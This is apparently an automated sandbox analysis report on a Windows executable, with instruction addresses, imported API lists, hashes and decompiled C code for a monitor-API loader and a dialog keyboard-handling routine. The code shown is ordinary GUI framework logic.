0x004240d1
0x004240d4
0x004240d7
0x004240d8
0x004240d9
0x004240da
0x004240db
0x00000000
0x00000000
0x00000000
0x00000000
0x00424077
0x00000000
0x00000000
0x0042406a
0x0042403e
0x00424043
0x00424049
0x0042404b
0x0042404d
0x00000000
0x00000000
0x00424053
0x00424059
0x00423f71
0x00423f71
0x00423f76
0x00423f76
0x00423f79
0x00423f82
0x00423f82
0x00423f87
0x00423f8d
0x00423f90
0x00423f92
0x00423f96
0x00423f98
0x00423fa0
0x00423fa1
0x00423fa7
0x00423fa7
0x00423fa9
0x00423faf
0x00423fb5
0x00423fbd
0x00423fc5
0x00423fc8
0x00423fc8
0x00423fd3
0x00423fd9
0x00423fdb
0x00423fe2
0x00423fe7
0x00423fea
0x00423fea
0x00423ff2
0x00423ff4
0x00423ffb
0x00424000
0x00424003
0x00424003
0x0042400b
0x00424010
0x00424016
0x00424022
0x00424025
0x00000000
0x00424025
0x00423f5f
0x00423f65
0x00423f6c
0x00000000
0x00000000
0x00423f6e
0x00000000
0x00423f1d
0x00423f20
0x00423f26
0x00423f41
0x00423f41
0x00423f44
0x00000000
0x00000000
0x00423f2c
0x00423f2e
0x00423f30
0x00423f36
0x00423f37
0x00423f3d
0x00423f3d
0x00423f40
0x00423f40
0x00000000
0x00423f40
0x00423f32
0x00423f34
0x00000000
0x00000000
0x00000000
0x00423f34
0x00000000
0x00423f41
0x00423ca0
0x00423ca4
0x00423ca5
0x00423cb4
0x00423cbf
0x00423cc2
0x00423cca
0x00423ccd
0x00423cd0
0x00423cd6
0x00423cd6
0x00423cda
0x00423cdd
0x00423ce0
0x00000000
0x00000000
0x00423ce6
0x00423ceb
0x00423cee
0x00423cf4
0x00423cf7
0x00423cfa
0x00423cfd
0x00423d03
0x00423d06
0x00423d09
0x00423d13
0x00423d13
0x00423d16
0x00423d1e
0x00423d20
0x00423e3d
0x00423e42
0x00423e45
0x00000000
0x00000000
0x00423e47
0x00000000
0x00000000
0x00000000
0x00423e4e
0x00423e51
0x00423e53
0x00423e59
0x00423e63
0x00423e6a
0x00423e6c
0x00423e78
0x00423e7c
0x00423e81
0x00423e85
0x00423e89
0x00423e8b
0x00423e8e
0x00423e93
0x00000000
0x00000000
0x00000000
0x00000000
0x00423d26
0x00423d26
0x00423e96
0x00423e96
0x00423e99
0x00423e99
0x00423e9d
0x00000000
0x00423e9d
0x00423d2d
0x00423d31
0x00000000
0x00000000
0x00423d37
0x00000000
0x00423d4c
0x00423d4f
0x00423d51
0x00000000
0x00000000
0x00000000
0x00000000
0x00423d74
0x00423d78
0x00423d7d
0x00423d80
0x00000000
0x00000000
0x00423d87
0x00423d8b
0x00423d90
0x00423d93
0x00000000
0x00000000
0x00423d9a
0x00423d9d
0x00423d9f
0x00000000
0x00000000
0x00423da3
0x00423da6
0x00423da8
0x00423daa
0x00423dab
0x00423dae
0x00423db4
0x00423db8
0x00423dba
0x00000000
0x00000000
0x00423dc0
0x00423dc2
0x00000000
0x00000000
0x00000000
0x00000000
0x00423e15
0x00423e18
0x00423e1c
0x00423e1e
0x00423e20
0x00423e20
0x00000000
0x00000000
0x00423e25
0x00423e29
0x00423e2c
0x00423e2f
0x00423e31
0x00423e32
0x00423e33
0x00423e34
0x00423e35
0x00423e38
0x00423e3a
0x00000000
0x00000000
0x00423dcd
0x00423dcd
0x00423dd0
0x00423dd2
0x00423dd4
0x00423dd5
0x00423dd8
0x00423ddb
0x00423de0
0x00423de3
0x00423de7
0x00423ded
0x00423df1
0x00423df3
0x00423df9
0x00423df9
0x00423dfc
0x00423dff
0x00423e02
0x00423e07
0x00423e0b
0x00000000
0x00423e0b
0x00423df5
0x00423df7
0x00423dc8
0x00423dc8
0x00000000
0x00423dc8
0x00000000
0x00000000
0x00000000
0x00000000
0x00423d3e
0x00423d41
0x00423d45
0x00000000
0x00000000
0x00423d59
0x00423d5c
0x00423d5f
0x00423d62
0x00423d62
0x00423d65
0x00423d65
0x00423d67
0x00423d6c
0x00000000
0x00000000
0x00423d37
0x00423e9f
0x00423e9f
0x00423ea3
0x00423ea6
0x00423eaf
0x00423eaf
0x00423eb8
0x00000000
0x00423eb8

APIs

__EH_prolog3.LIBCMT ref: 00423C20
_memset.LIBCMT ref: 00423C48
lstrlenA.KERNEL32(?), ref: 00423C58
_memset.LIBCMT ref: 00423CC2
_memset.LIBCMT ref: 00423ED8
VariantClear.OLEAUT32(?), ref: 00423F37
VariantClear.OLEAUT32(?), ref: 00423F5F
SysStringLen.OLEAUT32(?), ref: 00423FB9
SysFreeString.OLEAUT32(?), ref: 00423FD9
SysStringLen.OLEAUT32(?), ref: 00423FDE
SysFreeString.OLEAUT32(?), ref: 00423FF2
SysStringLen.OLEAUT32(?), ref: 00423FF7
SysFreeString.OLEAUT32(?), ref: 0042400B
__CxxThrowException@8.LIBCMT ref: 00424025
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 00424043
VariantClear.OLEAUT32(?), ref: 00424053

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 2c3f2ed3a63adb6c678afbc4eb9b234023f7d9c9c505a6d61dcc487a7d2347d9
Instruction ID: d11820e7d694a3bf09781ad7c68ac7ffedb5b153e309257cf6eecd4800a06c85
Opcode Fuzzy Hash: 2c3f2ed3a63adb6c678afbc4eb9b234023f7d9c9c505a6d61dcc487a7d2347d9
Instruction Fuzzy Hash: EDF1AF71E00219DFDF10DFA8E884AAEBBB0FF04305F54406AE951AB290D7789E56CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E932, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040E932() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x4524e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x4524e8 = E0040E8DA(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x4524c8 = 0;
						 *0x4524cc = 0;
						 *0x4524d0 = 0;
						 *0x4524d4 = 0;
						 *0x4524d8 = 0;
						 *0x4524dc = 0;
						 *0x4524e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x4524c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x4524cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x4524d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x4524d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x4524dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x4524d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x4524e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x4524e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x4524d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

0x0040e935
0x0040e93b
0x0040e94a
0x0040e956
0x0040e961
0x0040e963
0x0040e965
0x0040e9f9
0x0040e9f9
0x0040e9ff
0x0040ea05
0x0040ea0b
0x0040ea11
0x0040ea17
0x0040ea1d
0x0040ea23
0x0040e96b
0x0040e977
0x0040e979
0x0040e97b
0x0040e980
0x00000000
0x0040e982
0x0040e988
0x0040e98a
0x0040e98c
0x0040e991
0x00000000
0x0040e993
0x0040e999
0x0040e99b
0x0040e99d
0x0040e9a2
0x00000000
0x0040e9a4
0x0040e9aa
0x0040e9ac
0x0040e9ae
0x0040e9b3
0x00000000
0x0040e9b5
0x0040e9bb
0x0040e9bd
0x0040e9bf
0x0040e9c4
0x00000000
0x0040e9c6
0x0040e9cc
0x0040e9ce
0x0040e9d0
0x0040e9d5
0x00000000
0x0040e9d7
0x0040e9dd
0x0040e9df
0x0040e9e1
0x0040e9e6
0x00000000
0x0040e9e8
0x0040e9ea
0x0040e9ea
0x0040e9ea
0x0040e9e6
0x0040e9d5
0x0040e9c4
0x0040e9b3
0x0040e9a2
0x0040e991
0x0040e980
0x0040e9ed
0x0040e9f8
0x0040e93d
0x0040e93f
0x0040e949
0x0040e949

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,77435D80,0040EA7E,?,?,?,?,?,?,?,00410904,00000000,00000002,00000028), ref: 0040E95B
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 0040E977
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0040E988
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0040E999
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 0040E9AA
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 0040E9BB
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0040E9CC
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 0040E9DD

Strings

MonitorFromWindow, xrefs: 0040E982
GetMonitorInfoA, xrefs: 0040E9C6
USER32, xrefs: 0040E951
MonitorFromRect, xrefs: 0040E993
EnumDisplayMonitors, xrefs: 0040E9B5
MonitorFromPoint, xrefs: 0040E9A4
EnumDisplayDevicesA, xrefs: 0040E9D7
GetSystemMetrics, xrefs: 0040E971

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 81ea67fbf865d9771fdd53aff3bbb2a608d098fc93b1f6b111ee602b6243a3ea
Instruction ID: 15476577cc6dc8d6a5a5a725306e3d868eb310d56356e3246a290c3a4fbb417b
Opcode Fuzzy Hash: 81ea67fbf865d9771fdd53aff3bbb2a608d098fc93b1f6b111ee602b6243a3ea
Instruction Fuzzy Hash: F22184B2D00311BAC7519F66BEC052ABAE4B34F742764193FE005E3292C7B8C0919F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041FB12, Relevance: 26.0, APIs: 17, Instructions: 452
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041FB12(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E0041F96F(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E0040F78D(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E0040B523( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E0041F9C1(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E0041F46C(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E00415838(_t232);
								asm("int3");
								_push(0x28);
								E0042720D(E0043B16D, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E00410E42(0, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E00410E42(_t229, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E0041F41F(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E0041F41F(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E004162A2(_t232);
																	} else {
																		_t172 = E00416254(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E00415DFE(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E0041F4DD(_a4, _v24, _v44);
																			} else {
																				_t174 = E00410E42(_t229, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E0041F517(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E00415CBB(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E0040C1AE(_t255, _v36, _t229);
																			} else {
																				_t191 = E00410E42(_t229, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E0041F517(_t244);
																				E0041F6E1(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E0041F4BC(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E0041F862(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E004159FA(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E00415A74(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E00415AD1();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E0041F75C(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E0041F41F(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E0041FB12(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E00419A37(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E00410E42(_t229, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E0041F674(_t232, E00410E42(_t229, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E0041F6E1(_t229, _t232, _t260, _v24, E00410E42(_t229, _t260, GetFocus()));
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E0041F88F(_a4, _v24, E00410E42(_t229, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E00410E42(_t229, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E00410E42(_t229, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E004272B2(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E00415CBB(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}

0x0041fb12
0x0041fb13
0x0041fb15
0x0041fb16
0x0041fb1a
0x0041fb1b
0x0041fb1c
0x0041fb23
0x0041fb28
0x0041fb2c
0x0041fb2e
0x0041fb36
0x0041fb3a
0x0041fb3c
0x0041fb41
0x0041fb44
0x0041fb46
0x0041fb4a
0x0041fb4a
0x0041fb52
0x0041fb54
0x0041fb59
0x00000000
0x00000000
0x0041fb63
0x0041fb73
0x00000000
0x00000000
0x0041fb75
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fb63
0x0041fb77
0x0041fb77
0x0041fb44
0x0041fb3a
0x0041fb79
0x0041fb79
0x0041fb7b
0x0041fb87
0x0041fb8d
0x00000000
0x00000000
0x0041fb90
0x0041fb97
0x0041fb98
0x0041fbaa
0x0041fbac
0x0041fbcf
0x0041fbcf
0x0041fbd2
0x0041fc02
0x0041fc07
0x0041fc08
0x0041fc0f
0x0041fc14
0x0041fc17
0x0041fc19
0x0041fc23
0x0041fc1b
0x0041fc1b
0x0041fc1b
0x0041fc26
0x0041fc29
0x0041fc2c
0x0041fc36
0x0041fc39
0x0041fc3e
0x0041fc43
0x0041fc45
0x0041fc48
0x0041fc52
0x0041fc58
0x0041fc5b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041fc4a
0x0041fc4a
0x0041fc50
0x0041fc61
0x0041fc61
0x0041fc63
0x0041fd10
0x0041fd12
0x0041fd14
0x0041fd17
0x0041fd1c
0x0041fd1f
0x0041fd25
0x0041fd25
0x0041fd27
0x0041fd2e
0x0041fdb8
0x0041fdbd
0x0041fdc1
0x0041fdc4
0x0041ff01
0x0041ff04
0x00000000
0x0041ff0a
0x0041ff0a
0x0041ff0d
0x0041ffbd
0x00000000
0x0041ff13
0x0041ff13
0x0041ff16
0x0041ffc4
0x0041ffc8
0x0041ffcd
0x0041ffcf
0x00000000
0x0041ffd5
0x0041ffd5
0x0041ffd9
0x0041ffdc
0x0041ffde
0x0041ffe7
0x0041ffe0
0x0041ffe0
0x0041ffe0
0x0041ffec
0x0041ffee
0x0041fff0
0x00000000
0x0041fff6
0x0041fff6
0x0041fffa
0x0041fffc
0x00420000
0x00420000
0x00420005
0x00420009
0x00420019
0x0042001b
0x0042001d
0x0042002a
0x00420030
0x0042001f
0x00420020
0x00420020
0x00420035
0x00420037
0x00420039
0x00000000
0x0042003f
0x00420045
0x00420048
0x0042004b
0x00420050
0x00420053
0x00420060
0x00420060
0x00000000
0x00420053
0x0042000b
0x0042000b
0x00420011
0x00000000
0x00420011
0x00420009
0x0041fff0
0x0041ff1c
0x0041ff1c
0x0041ff1f
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ff1f
0x0041ff16
0x0041ff0d
0x00000000
0x0041fdca
0x0041fdca
0x0041ff59
0x0041ff59
0x0041ff59
0x00000000
0x0041fdd0
0x0041fdd0
0x0041fdd3
